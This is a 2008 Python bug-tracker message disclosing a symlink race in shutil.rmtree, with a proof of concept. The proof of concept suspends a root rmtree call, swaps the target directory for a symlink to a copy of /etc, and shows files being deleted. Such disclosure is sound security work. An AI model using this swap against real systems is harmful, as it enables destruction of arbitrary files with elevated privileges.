[issue4489] shutil.rmtree is vulnerable to a symlink attack
Mart Sõmermaa
report at bugs.python.org
Tue Dec 2 16:42:02 CET 2008
New submission from Mart Sõmermaa <mrts at mrts.pri.ee>:
Race condition in the rmtree function in the shutils module allows local
users to delete arbitrary files and directories via a symlink attack.
See also http://bugs.debian.org/286922
Attack:
---
# emulate removing /etc
$ sudo cp -a /etc /root/etc/
$ sudo python2.6
>>> for i in xrange(0, 50000):
... with open("/root/etc/" + str(i), "w") as f:
... f.write("0")
...
$ ls /root/etc > orig_list.txt
$ mkdir /tmp/attack
$ cp -a /root/etc/* /tmp/attack
$ sudo python2.6
>>> from shutil import rmtree
>>> rmtree('/tmp/attack')
>>> # press ctrl-z to suspend execution
^Z
[1]+ Stopped sudo python2.6
$ mv /tmp/attack /tmp/dummy; ln -s /root/etc /tmp/attack
$ fg
sudo python2.6
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/usr/local/lib/python2.6/shutil.py", line 225, in rmtree
onerror(os.rmdir, path, sys.exc_info())
File "/usr/local/lib/python2.6/shutil.py", line 223, in rmtree
os.rmdir(path)
OSError: [Errno 20] Not a directory: '/tmp/attack'
$ ls /root/etc > new_list.txt
$ diff -q orig_list.txt new_list.txt
Files orig_list.txt and new_list.txt differ
---
If the attack wasn't successful, /root/etc would not be modified and
orig_list.txt and new_list.txt would be identical.
----------
components: Library (Lib)
messages: 76753
nosy: mrts
severity: normal
status: open
title: shutil.rmtree is vulnerable to a symlink attack
type: security
versions: Python 2.3, Python 2.4, Python 2.5, Python 2.6, Python 3.0
_______________________________________
Python tracker <report at bugs.python.org>
<http://bugs.python.org/issue4489>
_______________________________________
More information about the Python-bugs-list
mailing list